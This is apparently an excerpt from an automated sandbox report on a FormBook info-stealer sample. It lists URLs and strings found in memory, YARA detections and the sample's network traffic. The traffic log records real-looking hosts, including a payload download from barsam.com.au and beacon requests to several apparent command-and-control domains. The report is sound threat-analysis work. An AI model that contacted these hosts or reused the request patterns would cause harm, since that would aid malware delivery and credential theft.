Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: explorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42073133985.0000000012015000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.d
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000000A.00000000.41901090373.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027345774.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41961022334.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42073133985.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42161443792.0000000001414000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: aSsc9zh1ex.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 0000000A.00000000.41901090373.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027345774.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41961022334.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42073133985.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42161443792.0000000001414000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42073133985.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: explorer.exe, 0000000A.00000000.42052359302.000000000ACF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42166284768.0000000003850000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42185468524.000000000B590000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.foreca.com
Source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: aSsc9zh1ex.exe, 00000007.00000001.41771391088.0000000000626000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: aSsc9zh1ex.exe, 00000007.00000001.41771153921.00000000005F2000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: aSsc9zh1ex.exe, 00000007.00000001.41771153921.00000000005F2000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: explorer.exe, 0000000A.00000000.41990992711.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42191069122.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42059179230.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41926696526.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppe
Source: explorer.exe, 0000000A.00000000.41990992711.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42191069122.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42059179230.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41926696526.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppf
Source: explorer.exe, 0000000A.00000000.42179312068.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42045949185.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41916352446.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41979204276.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmO
Source: explorer.exe, 0000000A.00000000.41901090373.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027345774.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42179312068.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42045949185.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41961022334.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41916352446.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42161443792.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41979204276.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000A.00000000.42179312068.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42045949185.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41916352446.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41979204276.0000000009ECA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSG
Source: explorer.exe, 0000000A.00000000.42058504298.000000000D826000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000000.42071929978.0000000011F59000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42003053261.0000000011F59000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41937972149.0000000011F59000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42204206643.0000000011F59000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.41928581843.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41992887926.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42192948449.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42061047062.000000000DA0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?Microsoft
Source: explorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: explorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: explorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000A.00000000.41990992711.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42191069122.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42059179230.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41926696526.000000000D8A3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comeu
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: https://sectigo.com/CPS0C
Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000A.00000000.42178218225.0000000009E02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42044824183.0000000009E02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41977721414.0000000009E02000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41915362691.0000000009E02000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/).dlll
Source: explorer.exe, 0000000A.00000000.42047983869.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41981155267.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41918189807.000000000A05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42181278199.000000000A05A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 0000000A.00000000.41998807854.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42066445764.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41934113235.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42199227042.000000000DEF2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com-C
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, explorer.exe, 0000000A.00000000.41937498865.0000000011EA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41901090373.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42033280306.000000000390E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42002519017.0000000011EA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027345774.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41961022334.0000000001414000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42161443792.0000000001414000.00000004.00000020.00020000.00000000.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/music/celebrity/the-voice-ariana-grande-and-john-legend-walk-off-when-blak
Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/graham-tries-t
Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: unknown DNS traffic detected: queries for: barsam.com.au
Source: global traffic HTTP traffic detected: GET /bin_QuCucbUMda229.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: barsam.com.auCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=NS202dJbEEETcB12VfvBfMMdjzaMJ2P7TP19ar/APX8BBmPLqx20W3tmhoszgkcRlb4O&1biX=C2MPnN HTTP/1.1Host: www.fungismartgrid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=QQL+SjwgUyPYxJnw2qa+Hze/zpoAw1vY2ZXVt5QHdkoKCL+B47r8V4uCmI0quTqEBnpn&1biX=C2MPnN HTTP/1.1Host: www.intelios.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=/aPRIOivZv/SK3yyBSrwMHS3aEcDnGoJdVwaw0Jv+PFvpIBjQ3dFVdba2CvjMIDrv82h&1biX=C2MPnN HTTP/1.1Host: www.herbalsfixng.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&1biX=C2MPnN HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=74kz/+Omydv/tJV+ps5/T47bI5nxKh+DjdkrvIsUcwHn/m5f3NJjyQUUG1A7gP1GNjyQ&k0=p8cH HTTP/1.1Host: www.nelvashop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&k0=p8cH HTTP/1.1Host: www.threads34.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_004056BB

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
